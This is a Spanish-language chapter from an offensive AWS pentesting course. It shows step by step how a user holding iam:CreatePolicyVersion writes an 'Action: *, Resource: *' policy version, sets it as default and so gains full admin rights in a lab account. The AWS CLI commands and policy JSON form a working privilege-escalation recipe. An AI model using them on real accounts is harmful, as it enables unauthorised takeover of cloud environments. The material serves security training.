# CreatePolicyVersion

{% hint style="danger" %}
¿Crees tener lo que se necesita para ser un experto en Pentesting contra AWS? Si nuestro libro te abrió los ojos a las posibilidades de la ciberseguridad ofensiva o si ya cuentas con habilidades en este campo, es momento de subir de nivel. Te retamos a certificarte en el [CPNA - Curso Profesional de Pentesting Contra AWS](https://spartan-cybersec.com/cursos/pentesting-contra-la-nube-de-aws/). No será fácil: te enfrentarás a un examen riguroso de 12 horas donde deberás hackear una infraestructura completa alojada en AWS. ¿Listo para el desafío? Acepta el reto y demuestra tu verdadero potencial.
{% endhint %}

{% hint style="warning" %}
Este laboratorio no se encuentra actualmente disponible en el CPNA.

Puedes practicar esta tecnica desplegando el ambiente en tu propia cuenta de AWS.

<https://github.com/BishopFox/iam-vulnerable>
{% endhint %}

Un atacante con el permiso `iam:CreatePolicyVersion` pueden crear una nueva versión de una política existente. En consecuencia, pueden crear una política que permita más permisos de los que tienen actualmente.

Luego del despliegue del laboratorio de IAM-Vulnerable, nos vamos a encontrar el siguiente usuario:

<figure><img src="https://1420718843-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjUr7ifmUiydm8bW32KgO%2Fuploads%2FEBhFmKl2Jgh6AOB28IHs%2Fimage.png?alt=media&#x26;token=8b13c347-fd2e-4d8d-b611-929c8bae27ba" alt=""><figcaption></figcaption></figure>

Este usuario tiene la siguiente política:

<figure><img src="https://1420718843-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjUr7ifmUiydm8bW32KgO%2Fuploads%2FCaennE52Vue1AU01tuJb%2Fimage.png?alt=media&#x26;token=b2f0428b-3d73-4981-aa41-f0322a9115f2" alt=""><figcaption></figcaption></figure>

Este usuario tiene el siguiente rol:

<figure><img src="https://1420718843-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjUr7ifmUiydm8bW32KgO%2Fuploads%2F0cwJoIeQeHhVhMCqxI35%2Fimage.png?alt=media&#x26;token=c32f10fd-c403-48a6-a7a1-beee9fea0d41" alt=""><figcaption></figcaption></figure>

Otra manera de validar lo anterior, es por medio del siguiente comando ya explicado:

Listando las políticas del usuario que será auditado:

```
aws iam list-attached-user-policies --user-name privesc1-CreateNewPolicyVersion-user
```

<figure><img src="https://1420718843-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjUr7ifmUiydm8bW32KgO%2Fuploads%2Fp6UEyHvleXwPBONju477%2Fimage.png?alt=media&#x26;token=678c53f3-f515-4a08-aa8a-ac8b254c1f58" alt=""><figcaption></figcaption></figure>

Obteniendo información relevante para nuestra auditoria utilizando el ARN de la política del usuario auditado:

{% code overflow="wrap" %}

```bash
aws iam get-policy-version --policy-arn arn:aws:iam::651927172911:policy/privesc1-CreateNewPolicyVersion --version-id v1
```

{% endcode %}

<figure><img src="https://1420718843-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjUr7ifmUiydm8bW32KgO%2Fuploads%2F77s25ZZ8kGADChRqxev3%2Fimage.png?alt=media&#x26;token=d65058fb-3c88-45f0-b305-f810683ac0a9" alt=""><figcaption></figcaption></figure>

Ahora con nuestro usuario administrador, vamos a generar unas credenciales con STS sobre dicho usuario.

{% code overflow="wrap" %}

```
aws sts assume-role --role-arn arn:aws:iam::651927172911:role/privesc1-CreateNewPolicyVersion-role --role-session-name privesc1
```

{% endcode %}

<figure><img src="https://1420718843-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjUr7ifmUiydm8bW32KgO%2Fuploads%2FQsF3b7lKDGY2BphoXlud%2Fimage.png?alt=media&#x26;token=6429a48e-4ed4-49d7-91df-9cff4d04ff03" alt=""><figcaption></figcaption></figure>

{% hint style="danger" %}
A partir de este momento, estaremos trabajando con el usuario <mark style="color:red;">**privesc1-CreateNewPolicyVersion-user**</mark>.

Todos los comandos posteriores deben tener especificado el --profile con su respectivo nombre de perfil.
{% endhint %}

Por lo anterior, tenemos que autenticarnos en AWSCLI y validar con el comando del [el-whoami-de-aws](https://books.spartan-cybersec.com/cpna/introduccion-a-aws/el-whoami-de-aws "mention")

Primero nos autenticamos:

```bash
aws configure --profile privesc1
```

<figure><img src="https://1420718843-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjUr7ifmUiydm8bW32KgO%2Fuploads%2FnyGGDZOmcVwi0zsE7GmL%2Fimage.png?alt=media&#x26;token=62a2e375-0530-4a7a-9608-5c6be3ea9898" alt=""><figcaption></figcaption></figure>

{% hint style="warning" %}
El token se especificará dentro del archivo plano de credenciales.
{% endhint %}

Y luego validamos con el whoami de AWS:

```bash
aws sts get-caller-identity --profile privesc1
```

<figure><img src="https://1420718843-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjUr7ifmUiydm8bW32KgO%2Fuploads%2FasF2aAsy6FKGP20Dxtvr%2Fimage.png?alt=media&#x26;token=f9783cce-b961-49cb-a448-29451adf34bd" alt=""><figcaption></figcaption></figure>

Si intentamos agregarnos al grupo de administradores, vamos a obtener un error de permisos:

{% hint style="info" %}
El siguiente comando se ejecuta dentro de un entorno de laboratorio controlado específicamente diseñado para prácticas de seguridad ofensiva. Su propósito es validar si tenemos los permisos necesarios para realizar operaciones administrativas. Es importante destacar que, aunque este método es efectivo en un ambiente controlado, su aplicación en un entorno real no es recomendable. En escenarios de producción, este tipo de acciones pueden ser fácilmente detectadas por sistemas de monitoreo, aumentando el riesgo de ser identificado por los equipos de seguridad.
{% endhint %}

{% code overflow="wrap" %}

```
aws iam add-user-to-group --group-name Group-Root-Spartan --user-name privesc1-CreateNewPolicyVersion-user --profile privesc1
```

{% endcode %}

<figure><img src="https://1420718843-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjUr7ifmUiydm8bW32KgO%2Fuploads%2FQomgxiM6TVZuFMoYXfdX%2Fimage.png?alt=media&#x26;token=9ea103c5-41ab-4bea-a5de-3c1ba9dd3cbe" alt=""><figcaption></figcaption></figure>

En este escenario, simplemente tenemos que crear un documento de política que permite todas las acciones de AWS:

{% code title="admin\_politica.json" %}

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "PermitirTodo",
      "Effect": "Allow",
      "Action": "*",
      "Resource": "*"
    }
  ]
}
```

{% endcode %}

Ahora simplemente tenemos que crear una nueva versión de la política que se aplica a nosotros.

{% code overflow="wrap" %}

```
aws iam create-policy-version --policy-arn arn:aws:iam::651927172911:policy/privesc1-CreateNewPolicyVersion --policy-document file://admin_politica.json --set-as-default --profile privesc1
```

{% endcode %}

<figure><img src="https://1420718843-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjUr7ifmUiydm8bW32KgO%2Fuploads%2FkyBSLrHJIIDyDMIiSxNI%2Fimage.png?alt=media&#x26;token=b74300fc-9e9d-4234-8568-57823e9d14b1" alt=""><figcaption></figcaption></figure>

Si revisamos ahora las versiones de nuestra política inicial, lograremos identificar una versión #2 con los valores especificados por nosotros.

<figure><img src="https://1420718843-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjUr7ifmUiydm8bW32KgO%2Fuploads%2F6klzWtnJvpn6PjZMu0kC%2Fimage.png?alt=media&#x26;token=615961e4-8f3f-4cd1-9fda-4f1338770aa9" alt=""><figcaption></figcaption></figure>